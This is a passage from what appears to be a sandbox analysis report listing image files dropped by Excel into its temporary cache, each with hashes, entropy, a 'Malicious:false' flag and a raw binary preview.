                                                    SHA-512:417FE0483ECB378708ED34086F6C460716B4497B3B1B87B4E513266202AD831A426F94D4B20D348A48BC02834B698033B8479F2A5221631A0AD200B929FF778E
                                                    Malicious:false
                                                    Preview: .PNG........IHDR...^...........A....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..!...!........%DIDATx^....S..pJ...ZHf......d...A(.2gJ....<G.L.".2D.d.2..}v...s.[..u..z.9.........g...:.f..V..-c....._....On.2f)..6-..,.Kk-..@...}"zK...}.@..ne.p".........}...7....7.)..x...jn....7.l......k.....3....g.y. ....^.........^.Q^x.._..W....7.?...=.........m.+...;.(...............u.]W...x.w6/..Ry.G...[.....X.x..g....?.........~W...?...B?.}.+.p...j.z..N*..w.}.SO=.4t..74?.........QG..,..2.....c..X..B.5[n.e.)R..[..}..K.o...{..x.......G?j....f.n..z...M7..,...e..b..W.j.8...K/m~._4..{l....4..k......i.....8....~P.....4...w../....:...../}6.'.|.<. ......^.o...w.........|...m6.h........~....G.].e|.m.Ys.a..:._.....@....Ft.....'....^k.[o...m...6..[!.s..,...]..3......W_...K.s:g......%.-.Xy6m..v.L..[l.X1.7..f../....M6.9..3K...f..E...&......_...+..1./...'?.,....>DE.}..g.a0.:..y..K_q7.x.{..v.i.y.W.y.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\782D07EB.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 94 x 142, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):9691
                                                    Entropy (8bit):7.959193699276328
                                                    Encrypted:false
                                                    SSDEEP:192:62uS2yEGqUUKfpuGBzO8DJFY/tgzqfM9Ey9F1V3lNRDCFvXR9gV:f+E7fnWtUEYbTRgfRmV
                                                    MD5:A8A216BB487BBC4AF6E1B88732A427E6
                                                    SHA1:D45419F3B1B29292B35D1FC6012E610CB92D91F1
                                                    SHA-256:110B0525BA4978477A56719B2617D5D2E51BFA9836856DA596EB049039377AE2
                                                    SHA-512:417FE0483ECB378708ED34086F6C460716B4497B3B1B87B4E513266202AD831A426F94D4B20D348A48BC02834B698033B8479F2A5221631A0AD200B929FF778E
                                                    Malicious:false
                                                    Preview: .PNG........IHDR...^...........A....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..!...!........%DIDATx^....S..pJ...ZHf......d...A(.2gJ....<G.L.".2D.d.2..}v...s.[..u..z.9.........g...:.f..V..-c....._....On.2f)..6-..,.Kk-..@...}"zK...}.@..ne.p".........}...7....7.)..x...jn....7.l......k.....3....g.y. ....^.........^.Q^x.._..W....7.?...=.........m.+...;.(...............u.]W...x.w6/..Ry.G...[.....X.x..g....?.........~W...?...B?.}.+.p...j.z..N*..w.}.SO=.4t..74?.........QG..,..2.....c..X..B.5[n.e.)R..[..}..K.o...{..x.......G?j....f.n..z...M7..,...e..b..W.j.8...K/m~._4..{l....4..k......i.....8....~P.....4...w../....:...../}6.'.|.<. ......^.o...w.........|...m6.h........~....G.].e|.m.Ys.a..:._.....@....Ft.....'....^k.[o...m...6..[!.s..,...]..3......W_...K.s:g......%.-.Xy6m..v.L..[l.X1.7..f../....M6.9..3K...f..E...&......_...+..1./...'?.,....>DE.}..g.a0.:..y..K_q7.x.{..v.i.y.W.y.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B545667.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 550x310, frames 3
                                                    Category:dropped
                                                    Size (bytes):29499
                                                    Entropy (8bit):7.667442162526095
                                                    Encrypted:false
                                                    SSDEEP:384:ac8UyN1qqyn7FdNfzZY3AJ0NcoEwa4OXyTqEunn9k+MPiEWsKHBm8oguHh9kt98g:p8wn7TNfzZ0NcnwR6kvKPsPWghY6g
                                                    MD5:4FBDDF16124B6C9368537DF70A238C14
                                                    SHA1:45E34D715128C6954F589910E6D0429370D3E01A
                                                    SHA-256:0668A8E7DA394FE73B994AD85F6CA782F6C09BFF2F35581854C2408CF3909D86
                                                    SHA-512:EA17593F175D49792629EC35320AD21D5707CB4CF9E3A7B5DA362FC86AF207F0C14059B51233C3E371F2B7830EAD693B604264CA50968891B420FEA2FC4B29EC
                                                    Malicious:false
                                                    Preview: ......JFIF.............C....................................................................C.......................................................................6.&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...0.F...GEH.[....^......Z]k?B..]...A.....q.<..].c....G....Z}.....=.y1.......x->.=.....<.........<..E....a.L...h.c....O..e..a.L...h.c....O..e..a.L...k/_..Mf.[.o.@C(..k^..P..l8........${..Ly.)..'".....N)." .$e.a....-....B.{.\f...).%a.J..>.9b.X..V.%i.Q....%h.V.E...X..V..Q..GQRR?A..!..;.g..B...2..u..W............'..kN.X.,Fy+G...(.r.g..y+O..X.,Fy+H.#)_,...%.r.9Q
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A2B0D764.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 935x300, frames 3
                                                    Category:dropped
                                                    Size (bytes):330271
                                                    Entropy (8bit):7.710378179204039
                                                    Encrypted:false
                                                    SSDEEP:6144:XCKIsPILDjoHJpc/qdtw23+c3sdMeqdnShOKpgXw8KkTdt+lM1U:XxQLDCJpc/o5+c6MvnYk9f5tne
                                                    MD5:FD07F12E2CB2C064A24D25510E2A3496
                                                    SHA1:B8D01E7C8E270C51B3A57768D3B66543F7E37E1D
                                                    SHA-256:DCC4160C26C10D0D9A6E4293494C3A5C794AF751879247809B9E215B80AAEC4F
                                                    SHA-512:BFDF689A254727DDD1A3EE86EDB757D2818DC12026C298224122D11F65FB62F350EBCE3A46BC6A256EE636BC791DF80FC96FEE2886B057E0C2D186A442BC5920
                                                    Malicious:false
                                                    Preview: ......JFIF.....,.,.....C....................................................................C.......................................................................,....!............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...+.O...................u......-C.7.......J..K....K.Y.......Vi..&h.1..@=&......f.-.+x&.V.....4.>'.3j0]h..T.m...\k..4.0.GS..Y,,...X..]%..m........4......U...<f...,t.-n.....3ji...h...7...os......w...s..|M....[.|H...4}2.^.^.[..........Z..L....hWN......,.A..~#..Z..g.]......x.A.V..M.7K..E.....>...K.,z=..v..O..Z.....I.cx....xc.....7WW.W.Euiwi.^.Z.[N.,....
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ACBFC72F.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):79394
                                                    Entropy (8bit):7.864111100215953
                                                    Encrypted:false
                                                    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                    MD5:16925690E9B366EA60B610F517789AF1
                                                    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                    Malicious:false
                                                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2D98C7E.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):50311
                                                    Entropy (8bit):7.960958863022709
                                                    Encrypted:false
                                                    SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                    MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                    SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                    SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                    SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                    Malicious:false
                                                    Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA225833.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                    Category:dropped
                                                    Size (bytes):8815
                                                    Entropy (8bit):7.944898651451431
                                                    Encrypted:false
                                                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                    MD5:F06432656347B7042C803FE58F4043E1
                                                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                    Malicious:false
                                                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BFDDCC98.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):50311
                                                    Entropy (8bit):7.960958863022709
                                                    Encrypted:false
                                                    SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                    MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                    SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                    SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                    SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                    Malicious:false
                                                    Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C190C815.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                    Category:dropped
                                                    Size (bytes):14198
                                                    Entropy (8bit):7.916688725116637
                                                    Encrypted:false
                                                    SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                    MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                    SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                    SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                    SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                    Malicious:false
                                                    Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3BC9C8C.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 248x140, frames 3
                                                    Category:dropped
                                                    Size (bytes):8540
                                                    Entropy (8bit):7.691804073982831
                                                    Encrypted:false
                                                    SSDEEP:192:a9lSuzORFED8EleeCaJ7nvm4SnvoX2aEiLx:a9lSuzObEPlDCa9vAvoX2k
                                                    MD5:739CD11415B870AD2A2171F6B6495DAA
                                                    SHA1:056A9540A9484C700189982AFD666B80F5B98CAD
                                                    SHA-256:82A148FD582A6F36DC66FAF148DB4C1E19ABC818F7C8BA9E9CEB9A3724A49D43
                                                    SHA-512:4850F5432FC33C214B32AA8BD238F0C2561B3E9DE348308C4593A4F4872ECAD32A7D9AD816664AE21EDB8E09BAF5C4EC2B1DA648CC51B18D3C8E0EC33535F213
                                                    Malicious:false
                                                    Preview: ......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...5.|#.c~....RzU.m/..!......yc......?..T.........OJ....?..Q.K......(.`.'..)=*..^..@...G./{j....9c.,.i*.l..._ ...j..R..EP.....o..g1.....K......)..E.....Q.?.?*..K......(.%.......Y..cb.t~U_S..).?.......?..T....@..0neN.....Ad_...........d........b..^..@...E.Y.6'.G.M0DN.?J....?..Q.K......(..".*/...A.....c...zw./?. .......Vq....?.f=^.Y..T_....T_...A.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C84C1666.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):51166
                                                    Entropy (8bit):7.767050944061069
                                                    Encrypted:false
                                                    SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                    MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                    SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                    SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                    SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                    Malicious:false
                                                    Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D16408F0.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):6815
                                                    Entropy (8bit):7.871668067811304
                                                    Encrypted:false
                                                    SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                                    MD5:E2267BEF7933F02C009EAEFC464EB83D
                                                    SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                                    SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                                    SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                                    Malicious:false
                                                    Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D27F0E7A.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):6815
                                                    Entropy (8bit):7.871668067811304
                                                    Encrypted:false
                                                    SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                                    MD5:E2267BEF7933F02C009EAEFC464EB83D
                                                    SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                                    SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                                    SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                                    Malicious:false
                                                    Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1F8712.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 248x140, frames 3
                                                    Category:dropped
                                                    Size (bytes):8540
                                                    Entropy (8bit):7.691804073982831
                                                    Encrypted:false
                                                    SSDEEP:192:a9lSuzORFED8EleeCaJ7nvm4SnvoX2aEiLx:a9lSuzObEPlDCa9vAvoX2k
                                                    MD5:739CD11415B870AD2A2171F6B6495DAA
                                                    SHA1:056A9540A9484C700189982AFD666B80F5B98CAD
                                                    SHA-256:82A148FD582A6F36DC66FAF148DB4C1E19ABC818F7C8BA9E9CEB9A3724A49D43
                                                    SHA-512:4850F5432FC33C214B32AA8BD238F0C2561B3E9DE348308C4593A4F4872ECAD32A7D9AD816664AE21EDB8E09BAF5C4EC2B1DA648CC51B18D3C8E0EC33535F213
                                                    Malicious:false
                                                    Preview: ......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...5.|#.c~....RzU.m/..!......yc......?..T.........OJ....?..Q.K......(.`.'..)=*..^..@...G./{j....9c.,.i*.l..._ ...j..R..EP.....o..g1.....K......)..E.....Q.?.?*..K......(.%.......Y..cb.t~U_S..).?.......?..T....@..0neN.....Ad_...........d........b..^..@...E.Y.6'.G.M0DN.?J....?..Q.K......(..".*/...A.....c...zw./?. .......Vq....?.f=^.Y..T_....T_...A.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3F1BB40.emf
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):3199944
                                                    Entropy (8bit):1.0723286533222698
                                                    Encrypted:false
                                                    SSDEEP:6144:5FPAuIU4U9tVvfJHGCOd7FPAuIU4U9tVvfJHGCOd2:5mIvhGJd7mIvhGJd2
                                                    MD5:6CFA3170A68147326768DE26F5E88F3C
                                                    SHA1:5ABCF9E540CFE7E9F1BB50F43FB139722402D141
                                                    SHA-256:5EC13FDB116FAD2A722159AC55F98A857E0925759BCAEB75AC83FCCBF7C3E8C2
                                                    SHA-512:5796C7D980E914485DD390F5EE14196EE89CCD7F6F237D4CA7AA88EC9158196E85FD7D5AC2990D9BA3DCCC55F63A8598F47B13020331F54134E931EF018C2A8B
                                                    Malicious:false
                                                    Preview: ....l................................H.. EMF......0.....................V...........................fZ..U"..F...ti..hi..GDIC........z.@m....Pi.........4.....4...........................................4..A. ...................(....................h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF9034E.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
